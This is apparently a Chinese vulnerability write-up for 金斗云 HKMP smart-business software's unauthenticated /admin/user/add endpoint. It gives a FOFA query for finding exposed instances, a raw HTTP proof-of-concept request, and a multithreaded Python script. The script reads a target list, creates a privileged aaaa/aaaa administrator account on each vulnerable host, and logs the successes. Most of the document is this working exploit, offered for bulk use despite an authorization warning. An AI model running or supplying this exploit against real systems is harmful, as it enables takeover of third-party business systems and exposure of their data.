漏洞描述
金斗云 HKMP是一款由金斗云软件科技(深圳)有限公司开发的智慧商业管理系统,旨在帮助企业实现高效经营和数字化转型。 金斗云 HKMP智慧商业软件 /admin/user/add 接口存在任意用户创建漏洞,未经身份验证的远程攻击者可以利用此漏洞创建管理员账户,从而接管系统后台,造成信息泄露,导致系统处于极不安全的状态。
漏洞危害
未经身份验证的远程攻击者可以利用此漏洞创建管理员账户,从而接管系统后台,造成信息泄露,导致系统处于极不安全的状态。
fofa
body="金斗云 Copyright"
poc
POST /admin/user/add HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
{"appId":"hkmp","mchId":"hkmp","deviceId":"hkmp","timestamp":1719305067,"nonce":5223015867,"sign":"hkmp","data":{"userCode":"aaaa","userName":"aaaa","password":"aaaa","privilege":["1000","8000","8010","2000","2001","2010","7000"],"adminUserCode":"admin","adminUserName":"系统管理员"}}
脚本(注意:下列脚本不是被动探测——它会向每个目标实际发送建号请求,一旦成功就会在目标系统上留下一个拥有上述权限列表的 aaaa/aaaa 账户;仅可在获得授权的情况下运行,并在验证后删除该账户)
import threading
from concurrent.futures import ThreadPoolExecutor
from urllib.parse import urlparse

import requests
import urllib3
# Silence the InsecureRequestWarning urllib3 emits for every request made with
# verify=False (POC_1 posts with verify=False, so TLS certificates are not checked).
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
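def POC_1(target_url):
    """Probe one target for the unauthenticated /admin/user/add account-creation bug.

    Sends the published PoC body to ``<target_url>/admin/user/add`` and treats an
    HTTP 200 whose body contains "成功" as confirmation. Confirmed targets are
    appended to ``存在漏洞的url.txt``; every outcome is printed to stdout.

    WARNING: this is not a passive check. A positive result means a real account
    (userCode/password "aaaa", carrying the privilege codes listed below) now
    exists on the target. Only run it against systems you are authorised to test,
    and remove that account afterwards.

    Args:
        target_url: Base URL of the target, e.g. ``http://host:port``. A trailing
            slash is tolerated.

    Returns:
        None. Results are reported via stdout and the output file.
    """
    # rstrip so "http://host/" does not become "http://host//admin/user/add".
    base_url = target_url.rstrip("/")
    vuln_url = base_url + "/admin/user/add"
    host = urlparse(base_url).netloc
    headers = {
        "Host": host,
        "Content-Type": "application/json;charset=UTF-8",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0",
        "X-Requested-With": "XMLHttpRequest",
        "Accept": "application/json, text/javascript, */*; q=0.01",
        "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate",
    }
    # Envelope fields (appId/mchId/deviceId/timestamp/nonce/sign) are copied
    # verbatim from the published PoC. Per the write-up these literal values are
    # accepted; whether the server validates sign/timestamp/nonce at all is not
    # established here.
    data = {
        "appId": "hkmp",
        "mchId": "hkmp",
        "deviceId": "hkmp",
        "timestamp": 1719305067,
        "nonce": 5223015867,
        "sign": "hkmp",
        "data": {
            "userCode": "aaaa",
            "userName": "aaaa",
            "password": "aaaa",
            "privilege": ["1000", "8000", "8010", "2000", "2001", "2010", "7000"],
            "adminUserCode": "admin",
            "adminUserName": "系统管理员",
        },
    }
    try:
        # verify=False: the write-up targets arbitrary hosts, many with self-signed
        # certificates; the warning is silenced at module level.
        response = requests.post(url=vuln_url, headers=headers, json=data, timeout=5, verify=False)
    except requests.RequestException as e:
        # Only network/HTTP-level failures are swallowed; anything else is a bug
        # in this script and should surface.
        print(f"\033[31m[x] 请求失败 {target_url}: {e}")
        return
    # Success detection is a substring heuristic from the PoC; a page that echoes
    # "成功" for some other reason would be reported as vulnerable.
    if response.status_code == 200 and "成功" in response.text:
        print(f"\033[32m[o] 目标 {target_url} 存在漏洞")
        with open("存在漏洞的url.txt", "a", encoding="UTF-8") as f:
            f.write(target_url + "\n")
    else:
        print(f"\033[31m[x] 目标 {target_url} 不存在漏洞")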
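def main():
    """Read targets from ./target.txt (one base URL per line) and probe each one.

    Blank lines are skipped instead of being sent to POC_1 as an empty URL.
    Targets are probed concurrently through a bounded pool rather than one
    thread per line, so a large target file cannot spawn thousands of threads.
    """
    with open("./target.txt", "r", encoding="UTF-8") as f:
        targets = [line.strip() for line in f if line.strip()]
    # POC_1 is I/O-bound (one HTTP request, 5 s timeout), so a modest pool keeps
    # throughput without exhausting the scanning host.
    with ThreadPoolExecutor(max_workers=20) as pool:
        # Iterating the results re-raises any exception that escapes POC_1
        # instead of leaving it buried in a dropped future.
        for _ in pool.map(POC_1, targets):
            pass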
if __name__ == "__main__":
main()